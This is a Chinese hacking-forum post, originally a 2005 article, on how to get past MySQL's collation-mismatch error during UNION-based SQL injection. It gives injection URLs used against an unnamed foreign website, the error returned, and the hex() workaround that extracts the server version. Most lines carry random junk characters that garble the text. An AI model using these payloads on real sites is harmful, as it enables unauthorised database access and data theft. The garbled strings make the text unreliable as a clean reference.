找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2086|回复: 0
打印 上一主题 下一主题

MySQL注射时ErrorNo.1267的突破

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:04:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本文作者:SuperHei
6 J0 d3 Z3 d- y0 [# A文章性质:原创* x1 K& ~- a: Y3 J
发布日期:2005-10-18$ U8 A! [  a" i  e& A+ E
测试个国外的站时:$ _* r' y; `0 ~7 L* L) y
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*: @  x( u# T' Z$ K  C
返回错误:
% M! [. z+ @) l& RIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
: P. E8 G3 ~2 J* o1 WMySQL Error No. 126
' |0 W0 p- O* u1 k0 V6 g看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。) L$ K8 R) W- Y9 l( n
解决办法:转为其他编码如hex。8 |& U+ V  E3 h6 P5 I
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*6 P. @$ [2 M) c. l7 T3 f
成功得到hex(version())的值为:. E& T- E7 W* |. m# F$ P$ w
342E312E332D626574616 i# V' g3 C6 N2 [- Q
回Mysql查询下得到:5 h1 V+ I' x$ @* o
mysql> select 0x342E312E332D62657461;4 Y, @$ X, [/ o1 S2 x
+------------------------+. E  G* |2 o0 y! o- D, u% D  I
| 0x342E312E332D62657461 |
: N5 K% n2 G4 r( H+------------------------+2 j! T+ [1 R0 {3 P
| 4.1.3-beta |, Q/ ~0 b# k; B1 n8 U1 U' b) h
+------------------------+6 d( z( {0 y! {5 ?' i  b8 O
1 row in set (0.00 sec)/ ~: q" S7 {0 ?2 L3 s& D

5 K, P4 T$ f" P2 T6 m1 G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表